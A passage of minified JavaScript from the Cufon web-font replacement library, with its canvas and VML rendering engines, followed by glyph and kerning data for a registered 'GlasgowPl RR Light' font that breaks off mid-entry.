function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());

/*!
 * The following copyright notice may not be removed under any circumstances.
 *
 * Copyright:
 * Licencja dla: Endorfine s.c. Polish modification by Pawel Kenig, KENTYPE, 2008.
 * Copyright (c) 1999, Rabbit Reproductions Typefoundry. All rights reserved. Data
 * Copyright (c) 1999 dtpTypes Limited.
 */
Cufon.registerFont({"w":153,"face":{"font-family":"GlasgowPl RR Light","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"0 0 3 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"4","bbox":"-14 -314 360 102","underline-thickness":"11.9531","underline-position":"-28.6523","unicode-range":"U+0020-U+2122"},"glyphs":{" ":{"w":90},"!":{"d":"55,-240r-8,194r-10,0r-7,-194r25,0xm26,-9v0,-17,32,-17,33,0v-1,16,-33,17,-33,0","w":80,"k":{"\u2019":4,"\u201d":4}},"\"":{"d":"94,-240r-31,67r-10,-2r16,-65r25,0xm50,-240r-30,67r-10,-2r16,-65r24,0","w":100},"#":{"d":"135,-198r-2,15r-29,0r-7,40r29,0r-3,15r-28,0r-8,42r-15,0r7,-42r-23,0r-7,42r-16,0r8,-42r-29,0r2,-15r29,0r7,-40r-28,0r2,-15r29,0r7,-42r16,0r-8,42r23,0r8,-42r15,0r-7,42r28,0xm89,-183r-23,0r-7,40r23,0","w":137},"$":{"d":"27,-139v-34,-35,-9,-102,40,-103r0,-26r15,0r0,25v14,0,28,2,42,8r-6,16v-11,-5,-23,-8,-36,-8r0,97v30,16,61,28,60,68v0,36,-26,61,-60,65r0,27r-15,0r0,-26v-18,0,-36,-6,-56,-16r7,-16v18,10,34,14,49,15r0,-102v-16,-8,-33,-17,-40,-24xm67,-137r0,-88v-37,5,-48,46,-26,71v5,6,14,11,26,17xm82,-14v39,-5,51,-52,27,-77v-5,-6,-14,-11,-27,-17r0,94","w":151,"k":{"9":12,"8":-2,"6":-1,"5":7,"4":-5,"3":2,"2":2,"1":5}},"%":{"d":"67,-244v31,0,52,28,52,61v0,33,-21,60,-52,60v-31,0,-53,-27,-53,-59v0,-34,21,-62,53,-62xm232,-240r-198,240r-19,0r198,-240r19,0xm179,-116v32,0,52,26,52,60v0,34,-21,60,-52,60v-30,0,-52,-26,-52,-59v0,-34,19,-61,52,-61xm67,-137v23,0,33,-21,33,-46v0,-25,-11,-47,-33,-47v-22,0,-34,21,-34,46v0,27,10,47,34,47xm179,-10v23,0,33,-21,33,-46v0,-25,-11,-47,-33,-47v-22,0,-34,21,-34,46v-1,26,10,47,34,47","w":245},"&":{"d":"166,-38v15,12,15,12,34,24r-10,13v-13,-8,-25,-14,-36,-24v-45,50,-139,35,-140,-37v0,-25,15,-48,43,-69v-30,-30,-29,-115,28,-114v24,0,43,22,42,48v0,36,-22,51,-46,68v27,36,42,52,73,81r16,-24r14,8xm84,-227v-38,3,-34,58,-12,85v24,-15,36,-33,36,-55v1,-16,-9,-31,-24,-30xm66,-118v-51,29,-40,109,22,107v19,0,38,-8,55,-24v-20,-18,-56,-54,-77,-83","w":190},"'":{"d":"50,-240r-30,67r-10,-2r16,-65r24,0","w":57},"(":{"d":"68,-261v-42,70,-42,214,0,283r-8,5v-47,-70,-63,-182,-17,-261v5,-8,10,-20,17,-32","w":82},")":{"d":"22,-266v63,77,55,220,0,293r-8,-5v42,-77,43,-207,0,-283","w":82},"*":{"d":"105,-207r-39,17r38,16r-11,16r-33,-25r7,41r-20,0r5,-41r-32,25r-10,-17r38,-15r-38,-17r10,-17r33,26r-6,-42r19,0r-5,42r34,-26","w":114},"+":{"d":"134,-51r-52,0r0,51r-17,0r0,-51r-52,0r0,-17r52,0r0,-52r17,0r0,53r52,0r0,16","w":147},",":{"d":"45,-24r-30,68r-10,-3r16,-65r24,0","w":57,"k":{"\u2019":2,"\u201d":2,"9":17,"8":4,"7":-18,"6":12,"5":-11,"4":12,"3":-7,"2":-5,"1":-4,"0":14,"*":5}},"-":{"d":"101,-79r-84,0r0,-17r84,0r0,17","w":117,"k":{"\u00ea":-5,"\u00c6":-5,"\u00b9":-4,"o":-5,"e":-5,"a":-4,"W":6,"T":33,"O":-5,"C":-5,"\u0105":-4,"\u0119":-5,"\u0106":-5,"\u00d3":-5,"\u00f3":-5,"z":12,"x":10,"s":-2,"q":-5,"g":-5,"d":-5,"c":-5,"Z":7,"Y":36,"X":8,"V":12,"S":12,"Q":-5,"G":-5,"9":13,"8":-6,"7":11,"6":-7,"5":7,"4":-12,"3":7,"2":12,"1":12,"0":-6}},"\u2010":{"d":"101,-79r-84,0r0,-17r84,0r0,17","w":117},".":{"d":"10,-9v0,-17,32,-17,33,0v-1,16,-33,17,-33,0","w":52,"k":{"9":12,"8":5,"7":-23,"6":13,"5":-15,"4":12,"3":-12,"2":-11,"1":-8,"0":15}},"\/":{"d":"116,-243r-87,246r-15,0r88,-246r14,0","w":130,"k":{"\u00ea":36,"\u00c6":17,"\u00a5":24,"\u00b9":36,"o":36,"e":36,"a":36,"W":-17,"T":-14,"O":18,"C":17,"A":24,"\u0105":36,"\u0119":36,"\u0106":17,"\u0104":24,"\u00d3":18,"\u00f3":36,"z":10,"y":7,"x":10,"w":6,"v":6,"u":26,"t":7,"s":26,"r":26,"q":36,"p":26,"n":26,"m":26,"j":7,"i":7,"g":33,"f":7,"d":36,"c":36,"Z":-12,"Y":-18,"X":-12,"V":-17,"S":5,"Q":18,"M":17,"G":18,"9":10,"8":17,"7":-7,"6":25,"5":11,"4":26,"3":-5,"2":5,"1":5,"0":18}},"0":{"d":"81,-243v56,6,67,51,67,123v0,66,-9,124,-67,124v-44,0,-67,-40,-67,-121v0,-69,8,-120,67,-126xm81,-10v44,-5,46,-52,46,-110v0,-60,-2,-104,-46,-110v-43,6,-46,50,-46,109v0,60,2,105,46,111","w":162,"k":{"\u2026":15,"\u00b0":6,"8":1,"7":10,"3":6,"2":13,"1":6,"\/":15,".":15,"-":-6,",":18,"%":2}},"1":{"d":"101,0r-92,0r0,-17r36,0r0,-202r-36,17r-3,-10v20,-9,30,-28,59,-28r0,223r36,0r0,17","w":106,"k":{"\u2026":-13,"\u00a2":14,"\u00b0":24,"9":17,"8":5,"7":-2,"6":12,"5":-2,"4":14,"3":-2,"0":11,"\/":-12,".":-13,"-":12,",":-12,"%":7}},"2":{"d":"14,-232v51,-24,116,-14,116,45v-1,50,-64,126,-99,171r96,3r0,13r-120,0v-2,-23,14,-28,23,-41v28,-40,81,-102,81,-145v0,-46,-52,-49,-93,-30","w":143,"k":{"\u2026":-2,"\u00b0":-2,"9":-2,"8":5,"7":4,"6":10,"5":2,"4":17,"3":-3,"2":10,"0":2,"\/":-2,".":-2,"-":17,",":-2}},"3":{"d":"55,-128v67,-8,83,78,34,109v-21,13,-47,21,-80,22r-4,-14v48,0,92,-19,93,-63v2,-34,-28,-48,-73,-46r0,-13v37,-3,70,-22,71,-57v1,-41,-50,-47,-84,-30r-4,-14v46,-21,107,-9,107,40v0,34,-30,57,-60,66","w":131,"k":{"\u2026":15,"\u00a2":4,"9":2,"7":5,"5":5,"3":4,"2":9,"1":4,"\/":11,".":15,"-":-6,",":15,"%":5}},"4":{"d":"133,-66r-22,0r0,66r-19,0r0,-66r-87,0r0,-13r73,-161r23,0r-80,159r71,0r7,-107r12,0r0,107r22,0r0,15","w":138,"k":{"\u2026":5,"\u00b0":10,"9":7,"8":-1,"7":4,"5":6,"4":-4,"3":4,"2":6,"1":7,"\/":2,".":5,"-":-12,",":5,"%":7}},"5":{"d":"35,-135v48,-3,88,13,88,55v0,51,-60,82,-116,84r-5,-14v49,-2,101,-25,101,-69v0,-38,-43,-46,-88,-41r9,-120r89,0r0,13r-71,4","w":132,"k":{"\u2026":18,"\u00b0":7,"9":11,"8":-2,"7":5,"6":-2,"5":6,"4":-2,"3":2,"2":11,"1":7,"0":-1,"\/":10,".":18,"-":-12,",":18,"%":12}},"6":{"d":"35,-124v45,-45,115,-11,112,54v-2,41,-24,73,-64,73v-88,0,-85,-153,-34,-203v20,-19,42,-35,75,-44r4,13v-50,18,-84,48,-93,107xm85,-11v28,0,43,-26,43,-57v0,-33,-17,-61,-47,-61v-22,0,-47,8,-48,35v-1,41,17,83,52,83","w":158,"k":{"\u2026":5,"\u00a2":2,"\u00b0":17,"9":15,"8":-1,"7":8,"5":7,"4":-2,"3":5,"2":8,"1":7,"\/":5,".":5,"-":-7,",":7,"%":18}},"7":{"d":"130,-227r-102,227r-23,0r107,-224r-104,-3r0,-13r122,0r0,13","w":132,"k":{"\u2026":69,"\u00a2":7,"\u00b0":-7,"9":2,"8":8,"7":-5,"6":21,"5":5,"4":24,"3":-6,"0":7,"\/":41,".":58,"-":31,",":60}},"8":{"d":"93,-128v33,20,55,29,57,67v2,37,-31,64,-70,64v-38,0,-70,-26,-70,-63v0,-29,17,-51,53,-66v-20,-13,-42,-39,-42,-61v0,-33,27,-56,61,-56v33,-1,60,21,59,54v0,26,-16,47,-48,61xm82,-229v-35,0,-55,41,-32,67v6,8,18,17,34,27v28,-12,41,-30,41,-53v1,-24,-20,-41,-43,-41xm80,-12v40,2,65,-47,37,-76v-8,-9,-24,-20,-45,-32v-60,21,-57,105,8,108","w":159,"k":{"\u2026":5,"\u00a2":4,"\u00b0":5,"9":6,"8":-1,"7":7,"5":5,"4":-1,"3":5,"2":7,"1":4,"0":1,"\/":6,".":5,"-":-6,",":7,"%":6}},"9":{"d":"75,-243v87,0,86,155,36,204v-17,18,-45,35,-76,43r-5,-12v56,-23,82,-44,93,-107v-45,45,-111,9,-111,-55v0,-42,24,-73,63,-73xm30,-173v0,57,59,85,94,40v4,-45,-13,-96,-51,-96v-27,0,-43,25,-43,56","w":158,"k":{"\u2026":38,"\u00b0":2,"8":6,"7":17,"6":2,"5":2,"4":5,"3":7,"2":17,"1":6,"\/":23,".":38,"-":-1,",":38}},":":{"d":"12,-121v0,-17,32,-17,32,0v1,8,-8,13,-16,12v-9,0,-15,-5,-16,-12xm12,-9v1,-17,32,-17,32,0v0,18,-31,16,-32,0","w":56,"k":{"*":19}},";":{"d":"14,-121v0,-17,33,-17,33,0v0,17,-33,15,-33,0xm43,-24r-30,68r-11,-3r17,-65r24,0","w":58,"k":{"*":19}},"<":{"d":"93,-120v4,7,23,14,14,20r-17,-17v-7,4,-13,21,-21,14r18,-17v-4,-7,-23,-14,-14,-20r17,17v7,-4,13,-21,21,-14","w":180},"=":{"d":"134,-69r-121,0r0,-17r121,0r0,17xm134,-32r-121,0r0,-17r121,0r0,17","w":147},">":{"d":"93,-120v4,7,23,14,14,20r-17,-17v-7,4,-13,21,-21,14r18,-17v-4,-7,-23,-14,-14,-20r17,17v7,-4,13,-21,21,-14","w":180},"?":{"d":"11,-236v57,-23,125,8,96,68v-17,34,-67,59,-56,122r-16,0v-17,-68,58,-97,58,-147v0,-36,-42,-40,-78,-28xm29,-9v1,-17,31,-17,32,0v0,18,-31,16,-32,0","w":132},"@":{"d":"154,-249v64,0,115,59,115,123v0,58,-71,111,-94,49v-17,37,-83,30,-83,-19v0,-48,50,-116,96,-81r1,-8r16,0r-14,102v0,13,7,18,21,18v28,-1,42,-33,42,-65v0,-54,-47,-101,-101,-101v-58,0,-107,54,-107,111v0,91,107,145,179,90r8,10v-73,70,-204,3,-204,-99v0,-67,58,-130,125,-130xm185,-161v-39,-31,-74,18,-74,59v0,36,36,36,53,16v14,-17,16,-49,21,-75","w":297},"A":{"d":"159,0r-20,0r-27,-94r-69,0r-26,94r-21,0r71,-240r21,0xm108,-108r-31,-109r-30,109r61,0","w":155,"k":{"\u0105":-12,"\u0119":-6,"\u0104":-18,"\u00c1":-18,"\u00c2":-18,"\u2019":24,"\u201d":24,"\u00c3":-18,"\u00c0":-18,"\u2026":-23,"\u00f8":-7,"\u2122":19,"\u00ae":12,"\u00df":-2,"\u00fc":-6,"\u00fb":-6,"\u00f9":-6,"\u00fa":-6,"\u00f5":-7,"\u00f6":-7,"\u00f4":-7,"\u00f2":-7,"\u00f3":-7,"\u00ef":-2,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00eb":-6,"\u00e8":-6,"\u00e9":-6,"\u00e7":-6,"\u00e5":-12,"\u00e3":-12,"\u00e4":-12,"\u00e2":-12,"\u00e0":-12,"\u00e1":-12,"\u00c5":-18,"\u00c4":-18,"z":-14,"x":-14,"v":2,"u":-6,"t":-6,"s":-8,"r":-2,"q":-7,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"j":-5,"i":-2,"h":-2,"g":-12,"f":-2,"d":-7,"c":-6,"b":-2,"Z":-15,"Y":25,"X":-13,"V":13,"S":-5,"M":-7,"J":-2,"?":-10,";":-23,":":-23,"\/":-22,".":-23,",":-23,"*":19,"!":-10,"A":-18,"\u00a5":-18,"T":29,"W":10,"a":-12,"\u00b9":-12,"e":-6,"\u00ea":-6,"o":-7}},"B":{"d":"22,-240v63,-2,125,-7,125,58v0,35,-17,55,-52,57v41,0,62,20,62,59v0,44,-21,67,-69,66r-66,0r0,-240xm126,-181v0,-49,-40,-45,-85,-44r0,94v48,3,85,-2,85,-50xm136,-66v0,-52,-41,-54,-95,-52r0,103v51,2,95,2,95,-51","w":168,"k":{"\u0105":-2,"\u0104":-7,"\u00c1":-7,"\u00c2":-7,"\u2014":-7,"\u2013":-7,"\u00c3":-7,"\u00c0":-7,"\u2026":5,"\u00ec":-5,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"\u00c5":-7,"\u00c4":-7,"Y":2,"V":-3,".":5,"-":-7,",":5,"A":-7,"\u00a5":-7,"T":8,"a":-2,"\u00b9":-2}},"C":{"d":"36,-115v0,57,12,101,57,103v14,0,30,-5,47,-14r5,15v-75,39,-131,2,-131,-106v0,-91,45,-151,125,-115r-4,15v-67,-31,-100,3,-99,102","w":146,"k":{"\u0105":-2,"\u0119":7,"\u0106":13,"\u0104":-12,"\u00d2":13,"\u00d4":13,"\u00d3":13,"\u00c1":-12,"\u00c2":-12,"\u00ff":7,"\u2019":-5,"\u201d":-5,"\u00d5":13,"\u00c3":-12,"\u00c0":-12,"\u2026":-14,"\u00f8":4,"\u00d8":13,"\u2122":-12,"\u00ae":12,"\u00fc":1,"\u00fb":1,"\u00f9":1,"\u00fa":1,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00ef":-14,"\u00ee":-10,"\u00ec":-22,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"\u00d6":13,"\u00c7":13,"\u00c5":-12,"\u00c4":-12,"y":7,"u":1,"l":-1,"k":-1,"j":-1,"i":-1,"h":-1,"b